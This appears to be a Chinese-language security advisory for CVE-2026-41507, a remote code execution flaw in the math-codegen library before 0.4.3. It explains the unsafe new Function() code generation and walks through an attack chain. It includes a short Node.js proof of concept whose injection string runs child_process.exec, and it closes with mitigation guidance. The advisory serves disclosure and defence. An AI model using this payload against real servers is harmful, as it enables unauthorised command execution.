CVE-2026-41507 math-codegen 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-41507

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

math-codegen

漏洞概述

math-codegen是一个用于从数学表达式生成代码的库。在0.4.3版本之前，该组件的cg.parse()函数存在严重的安全缺陷。当处理字符串字面量时，该函数未对输入内容进行有效的清理或过滤，直接将其注入到new Function()的函数体中执行。如果应用程序暴露了数学评估接口并将用户可控的输入传递给cg.parse()，攻击者即可构造恶意输入，利用该漏洞在服务器端执行任意系统命令，导致完全的远程代码执行风险。该问题在0.4.3版本中已得到修复。

技术细节

该漏洞的根本原因在于math-codegen库的cg.parse()方法使用了不安全的动态代码生成机制。在JavaScript中，new Function()构造函数允许根据字符串动态创建函数，这类似于eval()。在该受影响版本的库中，解析器直接将用户提供的数学表达式或字符串字面量拼接到生成的函数体中，而未执行任何转义或语法验证。攻击者可以通过精心构造的数学表达式（例如注入JavaScript代码而非单纯的数学运算），绕过基本的语法检查。一旦这些恶意字符串被传入cg.parse()，它们就会被当作代码执行。由于这通常发生在服务端对用户输入进行求值的场景中，攻击者无需任何认证即可利用此漏洞。利用方式通常包括发送包含恶意代码的HTTP请求到受影响的API端点，从而在服务器上下文中执行操作系统命令，读取敏感文件或建立反向Shell。

攻击链分析

STEP 1

侦察

攻击者识别出目标应用程序使用了存在漏洞的math-codegen库（版本低于0.4.3），并且发现了暴露给用户的数学表达式解析接口。

STEP 2

武器化

攻击者构造一段包含恶意JavaScript代码的数学表达式字符串，该字符串旨在闭合原有的函数作用域并注入系统命令执行代码（如调用child_process.exec）。

STEP 3

交付

攻击者通过HTTP请求将构造好的恶意载荷发送到目标服务器的数学解析API端点。

STEP 4

利用

服务器端应用程序接收到用户输入，未加过滤直接传递给cg.parse()函数。该函数将输入拼接到new Function()中并动态执行。

STEP 5

执行与控制

注入的恶意JavaScript代码在服务器端进程上下文中执行，攻击者成功获得远程代码执行权限，可进一步控制服务器或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-41507
// Demonstrates arbitrary code execution via unsanitized input in cg.parse()
// Usage: node poc.js

const cg = require('math-codegen'); // Vulnerable version < 0.4.3

// The vulnerability allows injecting arbitrary code into the new Function() body.
// By breaking out of the expected mathematical expression context,
// we can execute Node.js child processes.

// Payload example: Execute 'id' command on Linux/Mac or 'whoami' on Windows
// The input is treated as a string literal inside the generated function.
// We close the string/operation and inject a malicious statement.

var maliciousPayload = "1); process.mainModule.require('child_process').exec('echo VULNERABLE > pwned.txt'); //";

console.log("[*] Attempting to exploit CVE-2026-41507...");

try {
    // The vulnerable library passes the payload directly to new Function()
    // resulting in execution similar to: new Function('return ' + payload)()
    var result = cg.parse(maliciousPayload);
    console.log("[+] Payload sent to cg.parse(). Check if file 'pwned.txt' was created.");
} catch (e) {
    console.log("[-] Error during execution (may be due to syntax or environment):", e.message);
}

影响范围

math-codegen < 0.4.3

防御指南

临时缓解措施

如果不能立即升级版本，建议在应用网关层或代码中实施严格的输入校验机制。确保所有传递给数学解析器的输入仅包含数字、基本数学运算符和合法字符，严禁包含括号、函数调用或JavaScript关键字。同时，限制相关API的访问权限，仅允许可信来源调用。